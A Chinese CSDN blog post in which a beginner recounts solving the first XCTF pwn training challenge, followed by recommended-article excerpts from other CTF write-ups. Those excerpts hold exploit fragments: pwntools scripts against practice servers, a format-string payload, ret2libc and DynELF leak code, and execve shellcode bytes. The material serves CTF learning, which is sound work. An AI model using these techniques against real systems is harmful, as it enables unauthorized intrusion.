攻防世界pwn第一题

最新推荐文章于 2024-04-04 21:12:24 发布

原创最新推荐文章于 2024-04-04 21:12:24 发布 · 2.3k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

ctf pwn 专栏收录该内容

4 篇文章

订阅专栏

emmmmm，本人是一只刚刚学pwn的菜鸟(看写的题目也知道），这也算是自己第一次写pwn题吧，想保持一下，因此便有了此篇博客。话不多说，我们开始。

首先创建生成模拟环境，下载附件。

查看保护类型（什么都没有，233333）

习惯性拖进IDA看看，由于汇编才刚刚开始，所以还是按F5看C语言源代码算了。然后，果然，运行就能给flag

最后链接靶机？？？（不知道叫啥，就叫这个算了），然后就这样出来了，就是要稍微注意一下，链接的时候需要把55775前面的：去掉。

好啦，就这样写完了，溜了溜了，就是想记录一下，再见，等我做出下一题再来，嘿嘿。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Greic

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

攻防世界pwn——pwn1

qq_62076255的博客

12-21

677

做题记录

攻防世界 -pwn1

TedLau的博客

04-22

1043

0x00 前言首次做到跟canary绕过有关的知识，就准备写点东西记录下。 64位，保护几乎全开了。不慌，慌也没用。 0x10 分析运行可以发现几个功能，就是说：1选项是保存你将要输入的内容，2就是打印你之前输入的内容，3就是退出。 0x11 ida分析 main函数在main函数中发现了canary， canary的值在程序每一次运行都是会改...

参与评论您还未登录，请先登录后发表或查看评论

攻防世界 pwn1

10-25

1084

1 题目 2 分析流程很简单，提供三个功能，store print quit。store功能存在明显的溢出点：接下来就是利用溢出点，将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来，然后溢出one_gadget.exp如下： from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.

[攻防世界 pwn]——pwn1（内涵peak小知识）

Y_peak的博客

02-28

804

[攻防世界 pwn]——pwn1 题目地址：https://adworld.xctf.org.cn/ 题目： peak小知识这道题目的关键就是泄露canary，通常我们泄露canary有两种方法，遇见printf函数，并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s，打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。遇见可以利用的栈溢出gets函数，如果有puts函数，或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清

攻防世界pwn新手题wp（通俗易懂）

njh18790816639的博客

03-10

2248

get_shell 这道题先看看附件，探查一下信息，再用ida打开，就可以发现伪代码其实很简单的：然后在远程连接这个端口进行攻击了。并且我们能看到它的大致防护信息，然后来个脚本：此时就可以进行攻击了。这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试：大概的知道了一些漏洞，和一点信息，我们就可以进行破解了。 ...

攻防世界 pwn string

N1rvana的博客

11-15

4499

攻防世界string应该是新手区数一数二的难题，难点在理解程序流程。先观察主函数: alarm函数什么是alarm函数？如上图所示，在做一些pwn题的时候，我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数，即十进制对应60，所以该函数的作用是在程序运行60秒后，给进程发送SIGALRM信号，如果不另编写程序接受处理此信号，则默认结束此程序。为什么要使用alarm函数？一是比赛中常要远程连接服务器解题，官方不希望有队伍长时间解不出来题浪费服务器资源二

PWN篇：攻防世界PWN-100

weixin_44644249的博客

02-04

628

攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题，链接上收不到字符，在本地跑exp是可以拿到shell的。之前以为写错了，买了wp试也不行，重开环境还是不行，先记录一下，以后能连上了再提交flag。查看保护 IDA分析主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数（IDA解析这里有点问题，可以查看汇编代码分析），a2=200，a1=&v1[64] 当 i 小于200，read输入到v1，这个就是溢出点，当 i >=

攻防世界pwn新手区整理

Lenard404的博客

08-19

3384

小白尝试做pwn题QAQ get shell 惯例： IDA查看main函数：显然直接连接就可以得到权限。 nc ls cat 一条龙服务：菜鸟教程的Linux命令大全 hello pwn 惯例： IDA查看main: 查看if语句后的函数：目的明确：进入if语句。计算60106C和601068的偏移为4，read可以读入0x10，直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '

攻防世界--pwn1

qq_73149934的博客

02-22

652

canary，ret2libc 注意：只能打通远端，且libc中的systembinsh没用，用onegadget打通，在用onegadget时，注意rax需要为0，通过汇编看出选择3.exit退出时rax清0，可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb

攻防世界——pwn（1）

weixin_44319142的博客

04-08

3009

get_shell

pwn--攻防世界 pwn1

A13837377363的博客

04-04

748

canary一般是以'\x00'结尾，但是由于小端序存储，我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成：先读出canary,再读出main函数的返回地址，计算出libc的基址，因为只能填入一个地址，所以就想到one_gadget。观察保护和源码，有canary保护，并且只能溢出8字节，也就是一个地址。我使用的是python3，可能由于python版本问题，我运行的时候要将。然后是读取main函数的返回地址，与这个类似，就不赘述。一个非常便捷的工具。

攻防世界pwn难度1

weixin_63282980的博客

11-05

2000

攻防世界难度1的题目WP

攻防世界 pwn1 wp

qq_43409582的博客

11-06

548

0x01 先看保护：除了PIE全开了。打开ida分析明显的栈溢出漏洞，然后再看一下题目逻辑1是输入2是输出3是退出因为有canary保护所以要想办法泄露canary，回头看那个栈溢出漏洞，发现可以利用先发送0x88个a过去后面会自动给你爆出canary，有了canary之后，就简单了，所以思路就是：先利用栈溢出漏洞获取canary，再利用拼接的方法将前面的填充补全之后就是rop了。这...

攻防世界进阶区pwn1

weixin_45461609的博客

06-06

384

拿到题目checksec一下，发现开了canary保护。分析源程序，也很容易找到溢出点，题目开了canary，很显然v6就是canary，s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单，输入1进行read操作，2进行puts，3退出。那么思路就很清楚了，通过read填充0x88个a，然后通过puts打印，因为puts碰到\x00才会停止打印，那么就会有疑惑了，众所周知canary的最后一个字节为\x00，那打印0x88个’a’之后不是直接停止打印了吗？后来用gdb看了一下发现cana

攻防世界-pwn1-Writeup

SkYe's Blog

05-13

516

pwn1 考点：栈溢出，canary绕过基本情况程序实现功能是往栈上读写数据。保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 栈溢出 ...... while ( 1 ) { menu(); v3 = my_input(); switch ( v3 ) {

攻防世界：PWN刷题(一)

m0_53932372的博客

12-30

1729

cgpwn2 32bit，漏洞：栈溢出这题很简单，第一次输入参数“/bin/sh”到一个bss区域，第二次利用栈溢出getshell exp： from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag

攻防世界新手题（PWN——level0）

0pt1mus

12-19

1219

level0 转载自：superj.site的博客 0x00 首先，进行通过file判断附件文件类型。判断是ELF文件。这时就可以通过checksec判断文件的保护措施。得到只开启了执行保护，地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。发现该题中用到了w...

攻防世界pwn

最新发布

11-16

攻防世界平台中部分pwn题目及解题方法如下： - **签到题**：这是一道简单的题目，无需额外操作，直接可获得shell并拿到flag。使用Python的`pwn`库编写代码，通过`remote`函数连接到指定的IP和端口，使用`interactive`函数与目标交互，最后关闭连接。示例代码如下： ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` [^1] - **利用printf返回字符个数特性的题目**：思路是利用`printf`返回字符个数的特性，把`pwnme`改成8。构造的`payload`包含`pwnme`的地址、填充字符和格式化字符串`%10$n`。通过`remote`函数连接目标，依次接收提示信息并发送相应内容，最后使用`interactive`函数与目标交互。示例代码如下： ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` [^2] - **[GFSJ0469] string题目**：解题过程中使用IDA工具分析程序，将其插在第13行和第14行中间，获取`v4[0]`和`v4[1]`的地址，IDA吸收字符形成剑纹辅助解题 [^3]。 - **pwn - 200题目**： - **leak基本构造思路**：构造`leak`函数，其基本构造为112个`A`加上`write_plt`、漏洞存在函数的地址、`write`的第一个参数、`leak`函数的参数（给`DyELF`使用）和`write`的参数（打印8位地址使用）。通过`send`函数发送`payload`，接收数据并返回。使用`DynELF`查找`system`函数地址。示例代码如下： ```python def leak(address): payload = 'A'*junk + p32(write_plt) + p32(func_addr) + p32(1) + p32(address) + p32(4) r.send(payload) data = r.recv(4) print(data) return data dyn = DynELF(leak, elf=ELF('./pwn200')) sys_addr = dyn.lookup('system', libc) print('system address:', hex(sys_addr)) ``` [^4] - **leek出write地址返回main的解题方法**：先leek出`write`地址，返回`main`，计算偏移找到`system`和`/bin/sh`的位置以获得shell。使用`pwn`和`LibcSearcher`库，通过`remote`函数连接目标，构造不同的`payload`发送，接收数据并进行相应处理。示例代码如下： ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ``` [^5]